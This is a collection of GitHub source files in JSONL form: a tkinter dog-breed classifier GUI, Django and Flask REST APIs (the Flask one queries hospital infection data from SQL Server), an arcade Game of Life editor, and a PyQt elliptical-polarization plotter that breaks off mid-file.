"usage_type": "call"}, {"api_name": "reversi_zero.lib.data_helper.get_next_generation_model_dirs", "line_number": 106, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 110, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 112, "usage_type": "call"}, {"api_name": "os.path", "line_number": 112, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path", "line_number": 113, "usage_type": "attribute"}, {"api_name": "reversi_zero.agent.model.ReversiModel", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path", "line_number": 120, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path", "line_number": 121, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 122, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 123, "usage_type": "call"}, {"api_name": "os.rmdir", "line_number": 124, "usage_type": "call"}]} +{"seq_id": "39872405330", "text": "# coding: utf-8\n\nfrom tkinter import *\nfrom PIL import ImageTk, Image\nfrom tkinter import filedialog\nimport os\n\nfrom testme import Predict\n\nclass Window:\n\n\tdef __init__(self,classifier):\n\n\t\t#the most demanding function is loaded before application\n\t\tself.predict = Predict(classifier)\n\n\t\t#the main tkinter app\n\t\tself.root = Tk()\n\n\t\tself.root.title(\"Dog Breed Classifier\")\n\t\t#can't resize the window\n\t\tself.root.resizable(width=False, height=False)\n\n\t\t#create an empty filename in order to create the label\n\t\tself.filename=\"\"\n\n\t\t#label of the image's path\n\t\tself.pathtext = Label(self.root, text=self.filename)\n\t\tself.pathtext.grid(row=1,column=1)\n\n\t\t#label of the prediction\n\t\tself.predictiontext = Label(self.root, text=\"\")\n\t\tself.predictiontext.grid(row=2,column=1)\n\n\t\t#default image displayed\n\t\tself.open_img(\"FirstDog.jpg\")\n\n\t\t#button to load a new image\n\t\tbtn = Button(self.root, text='open image', command=self.open_img)\n\t\tbtn.grid(row=1,column=0)\n\n\t\t#button to launch the prediction\n\t\tbtn = Button(self.root, text='Run', command=self.getPredict)\n\t\tbtn.grid(row=2,column=0)\n\n\t\t#main loop of the tkinter window, create all the content before calling it\n\t\tself.root.mainloop()\n\n\tdef getPredict(self):\n\t\t\"\"\"\n\t\t\tHere we call the function that predicts a new image \n\t\t\"\"\"\n\n\t\t#the attribute allows to have a returned result\n\t\tprediction = self.predict.run(self.filename,printPrediction=True)\n\n\t\t#set the prediction label\n\t\tself.predictiontext[\"text\"] = \"Best match : \"+prediction\n\n\tdef openfn(self):\n\t\t\"\"\"\n\t\t\topen a dialog box to return the path of an image\n\t\t\"\"\"\n\t\tself.filename = filedialog.askopenfilename(title='Choose an image',\n\t\t\tfiletypes=[('jpg', '.jpg'),('jpeg', '.jpeg')])\n\n\tdef open_img(self,path=None,verbose=True):\n\t\t\"\"\"\n\t\t\tLoad a new image according to the path\n\t\t\tGo place the image in the window\n\t\t\"\"\"\n\t\t#have a default image which is load at the begining\n\t\t#otherwise have to charge an other one\n\t\tif path==None:\n\t\t\tself.openfn()\n\t\telse:\n\t\t\tself.filename=path\n\n\t\t#display the image loaded in the console\n\t\tif verbose:\n\t\t\tprint(\"=================\")\n\t\t\tprint(\"File open :\",self.filename)\n\n\t\t#keep the name of the img and not the whole path\n\t\tself.pathtext[\"text\"] = self.filename.split('/')[-1]\n\n\t\t#the image will be resized, it may look strange\n\t\timg = Image.open(self.filename)\n\t\timg = img.resize((400, 400), Image.ANTIALIAS)\n\t\timg = ImageTk.PhotoImage(img)\n\n\t\t#the new image is placed in the same position\n\t\tpanel = Label(self.root, image=img)\n\t\tpanel.image = img\n\t\tpanel.grid(row=0, column=0, columnspan=2, rowspan=1,\n\t\t sticky=W+E+N+S, padx=5, pady=5)\n\n\n\nif __name__ == \"__main__\":\n\t#Default classifier\n\tclassifier = \"dog_classifier.tfl.ckpt-24700\"\n\twindow=Window(classifier)\n", "repo_name": "jokfun/Dog_Breed_Classifier", "sub_path": "window.py", "file_name": "window.py", "file_ext": "py", "file_size_in_byte": 2707, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "testme.Predict", "line_number": 15, "usage_type": "call"}, {"api_name": "tkinter.filedialog.askopenfilename", "line_number": 64, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 64, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 88, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 88, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 89, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 89, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 90, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 90, "usage_type": "name"}]} +{"seq_id": "26073652114", "text": "from rest_framework.request import Request\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view,APIView\nfrom .models import Note\nfrom .serializers import NoteSerializer\nfrom django.shortcuts import get_object_or_404\n\n@api_view(http_method_names=[\"GET\", \"POST\"])\ndef homepage(request: Request):\n if request.method == \"POST\":\n data = request.data\n response = {\"message\": \"Hello world\", \"data\": data}\n return Response(data=response, status=status.HTTP_201_CREATED)\n response = {\"message\": \"Hello World\"}\n return Response(data=response, status=status.HTTP_200_OK)\n\nclass NoteListCreateView(APIView):\n \"\"\"\n View for creating and listing Notes\n \"\"\"\n serializer_class = NoteSerializer\n def get(self, request:Request, *args, **kwargs):\n notes = Note.objects.all()\n serializer = self.serializer_class(instance=notes, many=True)\n return Response(data=serializer.data, status=status.HTTP_200_OK)\n \n def post(self, request:Request, *args, **kwargs):\n data = request.data\n serializer = self.serializer_class(data=data)\n \n if serializer.is_valid():\n serializer.save()\n response = {\n \"message\": \"Note Created\",\n \"data\": serializer.data\n }\n return Response(data=response, status=status.HTTP_201_CREATED)\n return Response(data=serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n \nclass NoteRetrieveUpdateDeleteView(APIView):\n serializer_class = NoteSerializer\n\n def get(self, request:Request, note_id:int):\n note = get_object_or_404(Note, pk=note_id)\n serializer = self.serializer_class(instance=note)\n\n return Response(data=serializer.data, status=status.HTTP_200_OK)\n pass\n\n def put(self, request:Request, note_id:int):\n note = get_object_or_404(Note, pk=note_id)\n data = request.data\n serializer =self.serializer_class(instance=note, data=data)\n if serializer.is_valid():\n serializer.save()\n response = {\n \"message\": \"Note updated\",\n \"data\": serializer.data\n }\n return Response(data=response, status = status.HTTP_200_OK)\n return Response(data=serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request:Request, note_id:int):\n note = get_object_or_404(Note, pk=note_id)\n note.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n pass\n ", "repo_name": "jamestha3d/OTO_notes", "sub_path": "api/class_views.py", "file_name": "class_views.py", "file_ext": "py", "file_size_in_byte": 2610, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rest_framework.request.Request", "line_number": 10, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 14, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 14, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 14, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 16, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 16, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 16, "usage_type": "name"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 9, "usage_type": "call"}, {"api_name": "rest_framework.decorators.APIView", "line_number": 18, "usage_type": "name"}, {"api_name": "serializers.NoteSerializer", "line_number": 22, "usage_type": "name"}, {"api_name": "rest_framework.request.Request", "line_number": 23, "usage_type": "name"}, {"api_name": "models.Note.objects.all", "line_number": 24, "usage_type": "call"}, {"api_name": "models.Note.objects", "line_number": 24, "usage_type": "attribute"}, {"api_name": "models.Note", "line_number": 24, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 26, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 26, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 26, "usage_type": "name"}, {"api_name": "rest_framework.request.Request", "line_number": 28, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 38, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 38, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 38, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 39, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 39, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 39, "usage_type": "name"}, {"api_name": "rest_framework.decorators.APIView", "line_number": 41, "usage_type": "name"}, {"api_name": "serializers.NoteSerializer", "line_number": 42, "usage_type": "name"}, {"api_name": "rest_framework.request.Request", "line_number": 44, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 45, "usage_type": "call"}, {"api_name": "models.Note", "line_number": 45, "usage_type": "argument"}, {"api_name": "rest_framework.response.Response", "line_number": 48, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 48, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 48, "usage_type": "name"}, {"api_name": "rest_framework.request.Request", "line_number": 51, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 52, "usage_type": "call"}, {"api_name": "models.Note", "line_number": 52, "usage_type": "argument"}, {"api_name": "rest_framework.response.Response", "line_number": 61, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 61, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 61, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 62, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 62, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 62, "usage_type": "name"}, {"api_name": "rest_framework.request.Request", "line_number": 64, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 65, "usage_type": "call"}, {"api_name": "models.Note", "line_number": 65, "usage_type": "argument"}, {"api_name": "rest_framework.response.Response", "line_number": 67, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_204_NO_CONTENT", "line_number": 67, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 67, "usage_type": "name"}]} +{"seq_id": "15226305215", "text": "#Steps\r\n#1. Add Link with correct ???_all\r\n#2, Copy def and add ???all\r\n#3. Add database name in def\r\n#4. Change name in route\r\n\r\n#def configure_app(app):\r\n# Configure Compressing\r\n# Compress(app)\r\n\r\n#import flask_cache\r\n#from flask_cache import Cache\r\n#cache = Cache()\r\n#https://stackoverflow.com/questions/43263356/prevent-flask-jsonify-from-sorting-the-data/43263483#43263483 \r\n#https://docs.python.org/2/library/sqlite3.html\r\n#Ref 1: https://stackoverflow.com/questions/3783238/python-database-connection-close\r\n\r\nCOMPRESS_MIMETYPES = ['text/html', 'text/css', 'text/xml', 'application/json', 'application/javascript']\r\nCOMPRESS_LEVEL = 6\r\nCOMPRESS_MIN_SIZE = 500\r\n\r\nimport itertools\r\nimport pyodbc \r\nimport flask\r\nfrom flask import request, jsonify\r\nfrom flask_restful import Resource, Api, request\r\nfrom flask import Flask\r\n\t\r\napp = Flask(__name__)\r\napp.config['JSON_SORT_KEYS'] = False #New line from Stackoverflow.com - See above\r\napp.config[\"DEBUG\"] = True\r\napi = Api(app)\r\n\r\n#conn = pyodbc.connect('Driver={SQL Server};'\r\n# \t\t 'Server=DATABASESERVER,1433;'\r\n#\t\t\t\t\t 'Database=API_BayeSniffer;'\r\n#\t\t\t\t\t 'Trusted_Connection=yes;')\r\n#cursor = conn.cursor()\t\r\n@app.route('/', methods=['GET'])\r\ndef home():\r\n return '''\r\n

    Welcome to the BayeSniffer!

    \r\n

    Enjoy selecting posterior Probability of \"Health\" Things!

    \r\n

    Healthcare Associated Infections

    \r\n

    Healthcare Associated Infections = NC

    \r\n

    Healthcare Associated Infections: State=NC & Provider = 340053

    \r\n'''\r\n\r\n@app.route('/bayesniffer_api/v1/resources/HAII/all', methods=['GET'])\r\ndef api_HAI_all():\r\n\r\n\tconn = pyodbc.connect('Driver={SQL Server};'\r\n\t\t\t\t\t\t 'Server=DATABASESERVER,1433;'\r\n\t\t\t\t\t\t 'Database=API_BayeSniffer;'\r\n\t\t\t\t\t\t 'Trusted_Connection=yes;')\r\n\twith conn:\r\n\t cursor = conn.cursor()\t\r\n\r\n#\tcursor.execute('SELECT * FROM API_BayeSniffer.dbo.HAI_Master;')\r\n\tcursor.execute('SELECT Hospital, Provider,Address,City,State,ZIP_Code,\\\r\n\t Start_Date,End_Date,HAI,Better,Worse,Same,Score,Rank\\\r\n\t FROM API_BayeSniffer.dbo.HAI_Master \\\r\n\t\tORDER BY HAI_Master.[Hospital];')\r\n\r\n\tdesc = cursor.description\r\n\tcolumn_names = [col[0] for col in desc] #This puts SQL date into json\r\n\tdata = [dict(zip(column_names, row)) \r\n\t\t\tfor row in cursor.fetchall()]\r\n#\tprint(data)\r\n\r\n\treturn jsonify(data)\r\n\r\n@app.route('/bayesniffer_api/v1/resources/HAII', methods=['GET'])\r\ndef api_filter():\r\n\r\n conn = pyodbc.connect('Driver={SQL Server};' # Connection object #\r\n \t\t 'Server=DATABASESERVER,1433;'\r\n\t\t \t\t\t 'Database=API_BayeSniffer;'\r\n\t\t\t \t\t 'Trusted_Connection=yes;')\r\n with conn:\r\n cur = conn.cursor()\t #Once you have a Connection, you can create a Cursor object and call its execute() method to perform SQL commands. \r\n\t\t #See ref 1,\r\n\r\n query_parameters = request.args\t #This is a Flask request object that stores all the parameter values\r\n Provider = query_parameters.get('Provider')\r\n Hospital = query_parameters.get('Hospital')\r\n State = query_parameters.get('State')\r\n\t\t\r\n# query = \"SELECT * FROM API_BayeSniffer.dbo.HAI_Master WHERE\"\r\n query = ('SELECT Hospital, Provider,Address,City,State,ZIP_Code,\\\r\n\t\t\t\t\tStart_Date,End_Date,HAI,Better,Same,Worse,Score,Rank\\\r\n\t\t\t\t\tFROM API_BayeSniffer.dbo.HAI_Master WHERE')\r\n\t\t\r\n to_filter = [] #Initializing a dictionary of empty lists\r\n if Provider:\r\n query += ' Provider=? AND'\r\n to_filter.append(Provider) #SQL append clause\r\n if Hospital:\r\n query += ' Hospital=? AND'\r\n to_filter.append(Hospital)\r\n if State:\r\n query += ' State=? AND'\r\n to_filter.append(State)\r\n if not (State):\r\n return page_not_found(404)\r\n\r\n query = query[:-4] + ';'\r\n\t\r\n results = cur.execute(query, to_filter).fetchall()\t\r\n\r\n desc = cur.description\r\n column_names = [col[0] for col in desc] #This puts SQL date into json\r\n data = [dict(zip(column_names, row)) \r\n for row in results] #When I put in \"results\" it serialized the data. \r\n return jsonify(data)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n# app.run(host='127.0.0.1')\r\n app.run(host='192.168.2.253')\t\r\n# app.run(host='50.197.246.137')\t\r\napp.run()\r\n\r\n#/api/v1/resources/HAII/all'\r\n#http://127.0.0.1:5000/api/v1/resources/books/all \r\n#http://127.0.0.1:5000/api/v1/resources/books?author=Connie+Willis \r\n#http://127.0.0.1:5000/api/v1/resources/books?author=Connie+Willis&published=1999 \r\n#http://127.0.0.1:5000/api/v1/resources/books?published=2010\r\n#http://127.0.0.1:5000/api/v1/resources/HAII/all \r\n#http://127.0.0.1:5000/api/v1/resources/HAII?State=NC\r\n#http://127.0.0.1:5000/api/v1/resources/HAII?author=Connie+Willis&published=1999 \r\n#http://127.0.0.1:5000/api/v1/resources/HAII?published=2010", "repo_name": "jeffgroversr/python_code", "sub_path": "gunicorn_restful_v1.py", "file_name": "gunicorn_restful_v1.py", "file_ext": "py", "file_size_in_byte": 5394, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 29, "usage_type": "call"}, {"api_name": "flask_restful.Api", "line_number": 32, "usage_type": "call"}, {"api_name": "pyodbc.connect", "line_number": 52, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 71, "usage_type": "call"}, {"api_name": "pyodbc.connect", "line_number": 76, "usage_type": "call"}, {"api_name": "flask_restful.request.args", "line_number": 84, "usage_type": "attribute"}, {"api_name": "flask_restful.request", "line_number": 84, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 115, "usage_type": "call"}]} +{"seq_id": "40043233600", "text": "\"\"\"\nThe Game Creation View module creates a view for placing cells for Conway's Game of Life\n\"\"\"\n\nimport arcade\nfrom data import constants\nfrom data.game_view import GameView\nfrom data.board import Board\nfrom random import randint\n\nclass GameCreationView(arcade.View):\n \"\"\"\n The Game Creation View is used to create the initial setup for Conway's Game of Life\n \"\"\"\n def __init__(self, window: arcade.Window):\n \"\"\"\n The class constructor\n \"\"\"\n super().__init__(window=window)\n\n self.window = window\n\n self.board = Board(constants.BOARD_WIDTH, constants.BOARD_HEIGHT)\n\n self.board_dx = constants.SCREEN_WIDTH / self.board.width\n self.board_dy = constants.SCREEN_HEIGHT / self.board.height\n self.text_shown = True\n\n def on_show(self):\n \"\"\"\n Designs the grid for cell placement\n \"\"\"\n self.board.reset()\n\n def on_draw(self):\n \"\"\"\n Displays the grid for cell placement or the hint text\n \"\"\"\n arcade.start_render()\n\n if not self.text_shown:\n for cell in self.board.initial_cells:\n arcade.draw_lrtb_rectangle_filled(cell[0] * self.board_dx, cell[0] * self.board_dx + self.board_dx, cell[1] * self.board_dy + self.board_dy, cell[1] * self.board_dy, arcade.color.GREEN_YELLOW)\n\n for x in range(constants.BOARD_WIDTH + 1):\n x_pos = x * self.board_dx\n arcade.draw_lrtb_rectangle_filled(x_pos - 0.5, x_pos + 0.5, constants.SCREEN_HEIGHT - 1, 0, arcade.color.WHITE)\n for y in range(constants.BOARD_HEIGHT + 1):\n y_pos = y * self.board_dy\n arcade.draw_lrtb_rectangle_filled(0, constants.SCREEN_WIDTH - 1, y_pos + 0.5, y_pos - 0.5, arcade.color.WHITE)\n \n else:\n arcade.draw_text('Press \"R\" to randomize the cell creation\\nPress \"ESC\" to exit or return to the creation menu if in game\\nPress \"Enter\" to start\\nPress \"X\" to clear all cells\\nPress \"H\" to hide/show this text and show/hide grid for cell placement', 0, 0, arcade.color.WHITE, bold=True, font_size=15)\n\n def on_key_press(self, key, modifiers):\n \"\"\"\n Called whenever a key is pressed\n\n Args:\n key: Library used in the constant module\n \"\"\"\n if key == constants.ESCAPE_KEY:\n self.window.close()\n \n if key == arcade.key.ENTER:\n self.window.show_view(GameView(self.window, self, self.board))\n\n if key == arcade.key.X:\n self.board.clear(True)\n \n if key == arcade.key.R:\n self.board.clear(True)\n for x in range(self.board.width):\n for y in range(self.board.height):\n if randint(*constants.RANDOM_CELL_CREATION_RANGE) == 1:\n self.board.add_cell((x, y), True)\n \n if key == arcade.key.H:\n self.text_shown = not self.text_shown\n\n def on_mouse_press(self, _x, _y, _button, _modifiers):\n \"\"\"\n Determines the cell placement\n \n Args:\n _x: x axis position of the mouse press\n _y: y axis position of the mouse press\n _button: Conditions created from button press\n \"\"\"\n \n if not self.text_shown:\n board_x = int(_x // self.board_dx)\n board_y = int(_y // self.board_dy)\n\n self.board.flip_cell((board_x, board_y))", "repo_name": "ethancharles02/conways_game_of_life", "sub_path": "game_of_life/data/game_creation_view.py", "file_name": "game_creation_view.py", "file_ext": "py", "file_size_in_byte": 3453, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "arcade.View", "line_number": 11, "usage_type": "attribute"}, {"api_name": "arcade.Window", "line_number": 15, "usage_type": "attribute"}, {"api_name": "data.board.Board", "line_number": 23, "usage_type": "call"}, {"api_name": "data.constants.BOARD_WIDTH", "line_number": 23, "usage_type": "attribute"}, {"api_name": "data.constants", "line_number": 23, "usage_type": "name"}, {"api_name": "data.constants.BOARD_HEIGHT", "line_number": 23, "usage_type": "attribute"}, {"api_name": "data.constants.SCREEN_WIDTH", "line_number": 25, "usage_type": "attribute"}, {"api_name": "data.constants", "line_number": 25, "usage_type": "name"}, {"api_name": "data.constants.SCREEN_HEIGHT", "line_number": 26, "usage_type": "attribute"}, {"api_name": "data.constants", "line_number": 26, "usage_type": "name"}, {"api_name": "arcade.start_render", "line_number": 39, "usage_type": "call"}, {"api_name": "arcade.draw_lrtb_rectangle_filled", "line_number": 43, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 43, "usage_type": "attribute"}, {"api_name": "data.constants.BOARD_WIDTH", "line_number": 45, "usage_type": "attribute"}, {"api_name": "data.constants", "line_number": 45, "usage_type": "name"}, {"api_name": "arcade.draw_lrtb_rectangle_filled", "line_number": 47, "usage_type": "call"}, {"api_name": "data.constants.SCREEN_HEIGHT", "line_number": 47, "usage_type": "attribute"}, {"api_name": "data.constants", "line_number": 47, "usage_type": "name"}, {"api_name": "arcade.color", "line_number": 47, "usage_type": "attribute"}, {"api_name": "data.constants.BOARD_HEIGHT", "line_number": 48, "usage_type": "attribute"}, {"api_name": "data.constants", "line_number": 48, "usage_type": "name"}, {"api_name": "arcade.draw_lrtb_rectangle_filled", "line_number": 50, "usage_type": "call"}, {"api_name": "data.constants.SCREEN_WIDTH", "line_number": 50, "usage_type": "attribute"}, {"api_name": "data.constants", "line_number": 50, "usage_type": "name"}, {"api_name": "arcade.color", "line_number": 50, "usage_type": "attribute"}, {"api_name": "arcade.draw_text", "line_number": 53, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 53, "usage_type": "attribute"}, {"api_name": "data.constants.ESCAPE_KEY", "line_number": 62, "usage_type": "attribute"}, {"api_name": "data.constants", "line_number": 62, "usage_type": "name"}, {"api_name": "arcade.key", "line_number": 65, "usage_type": "attribute"}, {"api_name": "data.game_view.GameView", "line_number": 66, "usage_type": "call"}, {"api_name": "arcade.key", "line_number": 68, "usage_type": "attribute"}, {"api_name": "arcade.key", "line_number": 71, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 75, "usage_type": "call"}, {"api_name": "data.constants.RANDOM_CELL_CREATION_RANGE", "line_number": 75, "usage_type": "attribute"}, {"api_name": "data.constants", "line_number": 75, "usage_type": "name"}, {"api_name": "arcade.key", "line_number": 78, "usage_type": "attribute"}]} +{"seq_id": "35315206213", "text": "# Imports - standard modules\nimport sys\n\n# Import matplotlib and set it to use Qt5Agg for plotting\nimport matplotlib as mpl\nmpl.use(\"Qt5Agg\")\n\n# Import QtCore QtWidgets from PyQt5\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\n\n# Import functions from scipy library for scientific simulation\nfrom numpy import pi, linspace, sin, cos, tan, arcsin, arccos, arctan, array, dot\n\n# Import matplotlib backends\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FC\nfrom matplotlib.figure import Figure\n\n# Import pyplot from matplotlib for plotting\nfrom matplotlib import pyplot as plt\n\ndef getAngles(EOne, ETwo, delta):\n # Calculate the three parameters for the elliptical polarization\n # Auxillary angle: alpha\n # tan(alpha) = Ey/Ex\n # Ex = EOne cos(omega t); Let t= 0; therefore \n # Ex = EOne\n # Ey = ETwo cos(omega t + delta)\n # Ey = ETwo cos(delta)\n alpha = arctan(ETwo*cos(delta)/EOne)\n alphaDeg = alpha*180.0/pi\n \n # gamma: Angle of rotation\n # tan(2 gamma) = tan(2 alpha)*cos(delta)\n gamma = 1.0/2.0*arctan( tan(2*alpha)*cos(delta))\n gammaDeg = gamma*180.0/pi\n\n # Ellipticity angle: chi\n # sin(2 chi) = sin(2 alpha)* sin(delta)\n chi = 1.0/2.0*arcsin( sin(2*alpha) * sin(delta) )\n chiDeg = chi*180./pi\n\n # Return the rotation, auxillary and ellipticity angles in that order\n return gammaDeg, alphaDeg, chiDeg\n\n# Create an class derived from the FigureCanvas class. This is the canvas on which the sinewaves will be plotted\nclass MplCanvas(FC):\n def __init__(self, parent=None, width=8, height=6.5, EOne=2.5, ETwo=1, delta=pi/2):\n fig = Figure(figsize=(width, height))\n self.ax = fig.add_subplot(111)\n \n # Clear the axes every time the plot is called\n #self.ax.hold(False)\n\n # Set the figure to the canvas\n FC.__init__(self, fig)\n \n # Set some standard figure policies\n FC.setSizePolicy(self, QSizePolicy.Expanding, QSizePolicy.Expanding)\n FC.updateGeometry(self)\n \n # Draw the plot\n self.drawPlot(EOne, ETwo, delta)\n\n\n def drawPlot(self, EOne, ETwo, delta):\n self.ax.clear() # important !!!!这句话避免了保留之前绘制的东西 (源代码中这句没写!)\n\n r = ETwo/EOne\n\n # We will generate the points on the ellipse manually\n N=1024\n theta = linspace(0,2*pi,N)\n\n # Get the Cartesian coordinates of the ellipse for these theta values\n x = cos(theta)\n y = r*cos(theta+delta)\n\n # self.ax.plot(T[0],T[1],'r')\n self.ax.plot(x,y,'k')\n self.ax.set_ylim(-EOne-0.5,EOne+0.5)\n self.ax.set_xticklabels([])\n self.ax.set_yticklabels([])\n self.draw()\n\n# Define the mainwindow class\nclass MainApp(QMainWindow):\n def __init__ (self):\n \"\"\" Constructor or the initializer \"\"\"\n QMainWindow.__init__ (self)\n \n # Set some default attributes of the window\n self.setAttribute(Qt.WA_DeleteOnClose)\n self.setWindowTitle(\"Elliptical Polarization\")\n \n # define the main widget as self\n self.main_widget = QWidget(self)\n\n # Add the label widgets and sliders\n # x-Component Amplitude\n self.loEOne = QVBoxLayout()\n self.lblEOne = QLabel(\"x-Component: E1\", self)\n self.sldEOne = QSlider(Qt.Horizontal)\n self.sldEOne.setMinimum(2)\n self.sldEOne.setMaximum(50)\n self.sldEOne.setValue(25)\n self.sldEOne.setTickPosition(QSlider.TicksBelow)\n self.sldEOne.setTickInterval(1)\n self.edtEOne = QLineEdit(self)\n self.edtEOne.setMaxLength(5)\n self.loEOne.addWidget(self.lblEOne)\n self.loEOne.addSpacing(3)\n self.loEOne.addWidget(self.sldEOne)\n self.loEOne.addSpacing(3)\n self.loEOne.addWidget(self.edtEOne)\n \n # Add the label widgets and sliders\n # y-Component Amplitude\n self.loETwo = QVBoxLayout()\n self.lblETwo = QLabel(\"y-Component: E2\", self)\n self.sldETwo = QSlider(Qt.Horizontal)\n self.sldETwo.setMinimum(2)\n self.sldETwo.setMaximum(25)\n self.sldETwo.setValue(12)\n self.sldETwo.setTickPosition(QSlider.TicksBelow)\n self.sldETwo.setTickInterval(1)\n self.edtETwo = QLineEdit(self)\n self.edtETwo.setMaxLength(5)\n self.loETwo.addWidget(self.lblETwo)\n self.loETwo.addSpacing(3)\n self.loETwo.addWidget(self.sldETwo)\n self.loETwo.addSpacing(3)\n self.loETwo.addWidget(self.edtETwo)\n\n # Phase difference - all absorbed in y-component\n self.loPhase = QVBoxLayout()\n self.lblPhase = QLabel(\"Phase difference: delta (pi rad)\", self)\n self.sldPhase = QSlider(Qt.Horizontal)\n self.sldPhase.setMinimum(0)\n self.sldPhase.setMaximum(20*pi*100) ########3\n self.sldPhase.setValue(10)\n self.sldPhase.setTickPosition(QSlider.TicksBelow)\n self.sldPhase.setTickInterval(1)\n self.edtPhase = QLineEdit(self)\n self.edtPhase.setMaxLength(5)\n self.loPhase.addWidget(self.lblPhase)\n self.loPhase.addSpacing(3)\n self.loPhase.addWidget(self.sldPhase)\n self.loPhase.addSpacing(3)\n self.loPhase.addWidget(self.edtPhase)\n \n # Waves Param Layout\n self.loWaveParams = QHBoxLayout()\n self.loWaveParams.addLayout(self.loEOne)\n self.loWaveParams.addStretch()\n self.loWaveParams.addLayout(self.loETwo)\n self.loWaveParams.addStretch()\n self.loWaveParams.addLayout(self.loPhase)\n \n # Get the values from the sliders \n EOne = self.sldEOne.value()/10\n ETwo = self.sldETwo.value()/10\n delta = self.sldPhase.value()/(100*pi) - 10.0\n self.edtEOne.setText(str(EOne))\n self.edtETwo.setText(str(ETwo))\n self.edtPhase.setText(str(delta))\n\n # Get the rotation, auxillary, and ellipticity angles\n gammaDeg, alphaDeg, chiDeg = getAngles(EOne, ETwo, delta)\n\n # Create an instance of the FigureCanvas\n self.loCanvas = MplCanvas(self.main_widget, width=5, height=4, EOne=EOne, ETwo=ETwo, delta=delta)\n\n # Auxillary Angle\n self.loAuxAngle = QHBoxLayout()\n self.lblAuxAngle = QLabel(\"Auxillary Angle: (deg)\", self)\n self.lblAuxAngleVal = QLabel(str(\"%5.2f\" %(alphaDeg)), self)\n self.loAuxAngle.addWidget(self.lblAuxAngle)\n self.loAuxAngle.addSpacing(3)\n self.loAuxAngle.addWidget(self.lblAuxAngleVal)\n\n # Rotation Angle\n self.loRotAngle = QHBoxLayout()\n self.lblRotAngle = QLabel(\"Rotation Angle: (deg)\", self)\n self.lblRotAngleVal = QLabel(str(\"%5.2f\" %(gammaDeg)), self)\n self.loRotAngle.addWidget(self.lblRotAngle)\n self.loRotAngle.addSpacing(3)\n self.loRotAngle.addWidget(self.lblRotAngleVal)\n\n # Ellipticity Angle\n self.loEllAngle = QHBoxLayout()\n self.lblEllAngle = QLabel(\"Ellipticity Angle: (deg)\", self)\n self.lblEllAngleVal = QLabel(str(\"%5.2f\" %(chiDeg)), self)\n self.loEllAngle.addWidget(self.lblEllAngle)\n self.loEllAngle.addSpacing(3)\n self.loEllAngle.addWidget(self.lblEllAngleVal)\n \n # Set the focus to the main_widget and set it to be central widget\n self.main_widget.setFocus()\n 